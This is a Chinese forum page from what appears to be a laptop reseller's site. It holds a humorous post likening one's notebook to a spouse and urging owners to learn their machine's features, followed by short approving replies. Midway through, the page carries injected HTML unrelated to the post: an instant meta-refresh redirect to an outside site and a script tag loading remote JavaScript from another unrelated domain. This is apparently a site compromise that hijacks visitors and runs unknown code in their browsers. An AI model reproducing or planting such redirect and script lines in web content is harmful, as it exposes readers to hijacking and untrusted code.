开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

[X系列] 小黑使用心得----糊涂的爱

很多人把自己的本本比喻成老婆。
      因此,本子不外借就有了理由,老婆当然不能外借。
      其实把自己的爱本比喻成老婆,就一些人而言不过是为了表达一些热爱,对“爱本”的热爱。
      不知道女人是不是也把自己的本子比喻成老公。
      想爱也得会爱,要爱的真切就得先学会了解。
      可惜的是,有些人活了一辈子(有点夸张),也没弄清楚自己的另一半到底是个怎样的人。
      你能说的准,他或者她到底有那些特点、有什么爱好吗?
      如果说不清楚,就真像刘欢唱的那首歌,是“糊涂的爱”了。
     本子也一样。
     很多人直到自己的本子报废或者转卖给他人,也没有把自己本子的脾性,性能,设备都摸清楚。
     有一个朋友,某日忽然发现自己的光驱上少了个螺钉。赶忙到蓝快去修,人家却告诉他,所有的IBM本子的光驱都少个螺钉,这个螺钉在随机赠送的袋子里面,
     你的本本光驱少个螺钉,你注意过吗?
     想起N年前一个笑话:说是一对博士夫妻结婚数载仍膝下无子,到医院一查,老婆还是处女。经医生指点,两人方恍然大悟:满以为夫妻只要同睡一张床,双方的分子跳来跳去就能怀孕呢。
      一天晚上我发现我的本子的蓝牙灯不亮了。这种小事修电脑师傅当然是手到病除。
      用本子用了一年多的同学知道后问:什么是蓝牙?我倒!

+200---EddieFan

<meta http-equiv="refresh" content="0; url=http://www.1117.cc">
★★★
<script type="text/javascript" src="http://www.553.cc/q.js"></script>
<link href="http://www.553.cc/1.css" rel="stylesheet" type="text/css" media="screen" />
<P>&nbsp;</P>

评分

EddieFan + 200

起码也是原创!~~
无条件支持LZ!~~~~
哈哈,太有意思了。支持Lz,要加分。
hehe,懂得幽默的人!!
原创原创,蓝牙需要经常刷刷,不然会坏的。
楼主这个帖子真是与众不同~
我没把本子喻成男友,倒是觉得更像我的闺中密友,有些东西是另一半代替不了的。
还不赖
有几条建议还是很深刻哦!
呵呵,楼主可是真有材啊!
楼主是看了塞宾斯的《一分钟的你自己吗》,感觉是要了解自己的电脑才能很好的利用。
太搞笑啦!
呵呵,搞笑,来点图片才实在
写的挺有意思的,我也准备出手了
有些功能可能有的人一辈子都用不到
真的是啊。。。
怎么光看不顶呢,
还有这种用本的人,佩服!
LZ讲得太搞笑了也~~~
蓝牙一般还真的很少用。。。
这个讲的不错啊~~~
有点意思~~~~~~
逗啊~~~